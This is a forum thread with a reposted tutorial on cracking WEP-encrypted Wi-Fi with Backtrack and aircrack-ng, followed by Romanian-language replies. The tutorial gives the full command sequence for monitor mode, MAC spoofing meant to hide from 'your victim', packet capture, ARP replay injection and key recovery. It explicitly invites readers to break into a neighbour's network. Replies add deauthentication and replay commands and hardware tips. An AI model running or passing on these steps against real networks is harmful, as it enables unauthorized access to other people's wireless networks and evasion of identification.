Jump to content
Nytro

How To Crack WEP using Backtrack w/Pictures

Recommended Posts

Posted

How To Crack WEP using Backtrack w/Pictures

Author: Warlock

This tutorial is strictly educational, neither I, nor leetcoders is responsible for whatever trouble you may get into by using this method.

Tinypic killed a couple of my images, I'm sure you can still manage to do it.

Welcome to my tutorial, by the end of this tutorial, you should be able to have cracked your (or your nearby neighbors) WEP encrypted wifi.

What you need:

Backtrack 3 or 4 (In this tutorial I used 3, since I had it laying around) Which you can get here; Downloads

A computer with a compatible wireless card (if you have a newer computer, this will most likely work on your machine)

Patience

Assuming you've already downloaded backtrack, and burned it using your favorite burning software, restart your computer with the backtrack disc, since it can be used as a livecd.

First of all, before you do anything, navigate to the wireless assistant;

Start>Internet>Wireless Assistant

If you do not see any networks, then this will not work for you.

Open the konsole, which is here;

snapshot1.png

Now type, airmon-ng

It should show you your wireless card's info, like so;

snapshot2.png

Now type airmon-ng stop (your interface)

Should show you this;

snapshot3.png

Now type ifconfig (your interface) down

snapshot4.png

Then type macchanger --mac 00:11:22:33:44:55 (your interface)

This spoofs your mac address, so your victim cannot figure out who you are.

snapshot6.png

Type airodump-ng (your interface)

snapshot7.png

This will open up a new konsole.

Once you see the network you want to attack, press CTRL+C (This will stop your wirless card from searching for new networks)

snapshot8.png

Open a new konsole

Type airodump-ng -c (channel) -w (file name) --bssid (bssid) (your interface)

Like so;

snapshot9.png

It will open up yet another konsole. Now let it run for a few minutes (until it reaches about 5000 or so packets, the more the better chance of cracking it.)

Go watch a video on youtube, or go on HF, any network activity will increase the amount of packets you pickup.

snapshot11.png

Open another konsole and type aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (your interface)

snapshot12.png

Type aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (your interface)

snapshot13.png

Let it run for about 5 minutes, while it collects the packets. Then press CTRL+C

Now type aircrack-ng -b (bssid) (filename-01.cap)

snapshot16.png

You have found the WEP key, mine being 77838557744334834238286364 (without the colons)

And you're done!

~Warlock

Sursa: LeetCoders

Posted (edited)

probabil n-ai facut bine injectia sau chipset-ul nu este patchuit ca sa injecteze pachete cum trebuie.in orice caz, sansa sa aduni cat mai multe iti creste odata ce acel network lucreaza.daca vezi ca mac-ul victimei este conectat si foloseste internetul(poti folosi wireshark sa faci sniffing pe w ethernet), atunci este momentul cel mai prielnic sa aduni IVs

LE:in loc de ultimele 2 comenzi

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (your interface) & aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (your interface) 

eu foloseam mereu metoda personala pentru ca mergea mai bine asa

 aireplay-ng --arpreplay -e blabla -b bl:aa:aa:aa -h 00:11:12:13:14:0D mon0 & aireplay-ng --deauth 10 -a 00:19:5B:E7:52:70 -c 00:12:17:94:90:0D mon0

Edited by wildchild
Posted (edited)

Pe AP-ul ala cu WEP ,in alea 8 ore ,ai avut client asociat ?

Daca DA ,atunci in max 15 min trebuia sa ai cheia .

Daca NU ,atunci e mai greu...

Cateodata e nevoie chiar de peste 50000 de data (IVs)

Edited by sorelian
Posted

pentru cei ce au #Data mic si creste greu sau nu creste deloc dupa ce dati comanda de asociere aireplay-ng -1 0 -a etc. si zice Association successfull dati aireplay-ng -1 -p 0841 -c FF:FF:FF:FF:FF:FF -b TARGET MAC PLACA WIRELESS (eg. wlan or mon).

cand a prins pachetul o sa trebuiasaca sa dati Y si #Data are trebui sa creasca considerabil. Aceasta comanda o sa reduca considerabil timpul de spargere a unei retele.

Posted

Am folosit pana acum backtrack5 si 4 pe vmware workstation 7.1.4 build-385536 si am windows7.

Am adaptor wireless Broadcom 802.11 pe laptop hp625.

Problema: nu-mi recunoaste adaptorul!! Am tot rascolit googleu pt raspunsuri si nimic clar. Acum mi se ia backtrack 3, si 2 nu mai gasesc pe nicaieri, probabil pe astea sa vrea.

Stie cineva de ce nu-l recunoaste? Trebuie instalate niste drivere specifice, copiezi dll-uri ?!?!

Posted (edited)

Salut. La cei care nu va merge bine luati-va o placa cu chipset Atheros . Un chipset care merge bine rau de tot este realtek rtl 8187 :-) maj passwordurilor sunt de 11 sau de 13 (depinde in ce tara va aflati) si le scoate cam la 28000/35000 date. cheia poate fi scrisa in ascii sau nr de ex un 0 este defapt un 30. Am vazut mai sus la poze ca se skimba mac-ul si etc. Backtrack cat si restu de editii care fac wlanaudit(haxpuppy wifiway wifislax) nu mai trebuie skimbat nimik mac ii dai direct mon0 si ia macu placii automat. Ah si majoritatea au si un autoscript.sh ceva de genul asta daca nu va descurcati chiar are optiune sa aleaga si sa sparga singur. Ideea este oricat de lunga e parola (26) cu suficiente date tot il iei :-). Cateodata mai gastiti modemuri care se filtreaza altele pe care nu se asociaza si Canalul 13 nush daca o sa auziti pe cineva sa ia modem pe 13 :-)). La cei care nu va merge grafica la backtrack folositi screen. Iar am vazut mai sus ca cineva vb despre metoda reproducerii paketelor care nu este o idee chiar buna. pt ca poti prinde 1 paket nasol si sal reproduca la max degeaba ca defapt paketele sunt najpa. De ex in timp ce scanati daca vreti sa vedeti cateva ARP si cateva date luati tel cu wifi bagati o parola de 11 sau de 13 char si tot face date/ARP asta nu inseamna ca paketul este bun. Daca aveti tel cu android puteti cauta versiunea pt el: automatikwlan ii zice . si pt cei care stati in spania daca vreti sa invatati sa luati WPA va pot ajuta. Inca ceva folositor: toti vrem sa aflam unde se afla wlanurile astea sa le prindem mai bine etc si ne plimbam cu laptopu prin casa. Ei bine nu putem sti exact pozitia dar (exista un gps pt asa ceva dar e ceva cam scump) putem sti cand suntem mai aproape de modem sau mai departe. Va uitati ce gateway aveti deskideti 1 cmd si dati ping -t gatewayul vostru. Cu cat e mai mic cu atat sunteti mai aproape. Aici aveti o lista de adapters care intra in monitor mode sa nu va incurcati aiurea: http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#which_is_the_best_card_to_buy

Edited by agstrato
Posted

"Open a new konsole

Type airodump-ng -c (channel) -w (file name) --bssid (bssid) (your interface)

Like so; "

In cazul de mai sus file name e "hackforums" cred.

Ce e cu acel file? Ce trebuie sa contina?:-/

Posted

Cred ca acum e --channel in loc de -c.

In acel fisier se salveaza pachetele (nu intregi) necesare pentru spargerea parolei.

Nici eu nu stiu prea multe in acest domeniu, pune un nume de fisier, pe care sa il tii minte, il vei folosi cu aircrack.

Posted
"Open a new konsole

Type airodump-ng -c (channel) -w (file name) --bssid (bssid) (your interface)

Like so; "

In cazul de mai sus file name e "hackforums" cred.

Ce e cu acel file? Ce trebuie sa contina?:-/

poti sa pui ce vrei la nume, acolo se salveaza pachetele receptionate de airodumo-ng , iti trebuie pentru aircrack-ng

uite aici si un video tutorial :

Posted

Sunt diferente:

- versiunea de kernel si driverele pentru placile de retea suportate

- patch-urile pentru drivere ca sa suporte packet injection (sau cum se cheama)

- versiunile de airmon/aircrack... pe langa celelalte utilitare

Deci, cel putin in teorie, 5 ar trebui sa aiba multe plusuri fata de 3.

PS: Aceste diferente nu prea sunt "vizibile" de obicei, poate doar sa folosesti --channel in loc de -c.

Posted

Depinde de comanda pe care o dai ... la airmon-ng trebuie --channel , la airodump-ng merge -c !!

Plusurile nu sunt decat daca ai backtrack 3 fara update-uri ... daca faci update la aircrack in backtrack 3 va fi acelasi cu cel din backtrack 5 ! Oricum singurile schimbari sunt update-urile la driverele de injectie de pachete , comenzile sunt aceleasi iar daca ai vreo nedumerire poti da aricrack-ng --help sau RTFM !!

Posted

din cate am inteles balanta se inclina inspre GNOME fiind mai accesibil [KDE fiind putin mai complicat/complex],KDE ar avea ceva mai multe buguri dar o grafica mai atragatoare.

Pentru cei care l-au folosit la WEP crack, ce imi recomandati?

Nytro : Mc mult pentru ajutor si sugestii (:

Posted

Eu folosesc KDE ...

Cel mai bine le incerci pe amandoua... cu care te intelegi mai bine cu ala lucrezi in continuare ! Comenzile difera de la unul la altul dar nu cred ca asta ar fi o problema !!

Posted

Lol fratilor, nu conteaza desktop enviromentul!!!! E doar o chestie de preferinta <(T^T)> nu are nicio legatura cu functionalitatea programelor gen suita aircrack-ng O_O Tot in consola o sa lucrati in orice desktop env. D-asta s-au si pus mai multe "arome" la Backtrack odata cu a cincea iteratie a acestei distributii....

Posted
Lol fratilor, nu conteaza desktop enviromentul!!!! E doar o chestie de preferinta <(T^T)> nu are nicio legatura cu functionalitatea programelor gen suita aircrack-ng O_O Tot in consola o sa lucrati in orice desktop env. D-asta s-au si pus mai multe "arome" la Backtrack odata cu a cincea iteratie a acestei distributii....

nu ai vazut ce am scris mai sus? sa le incerce pe amandoua si sa se decida singur... fiecare dupoa preferinte ...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...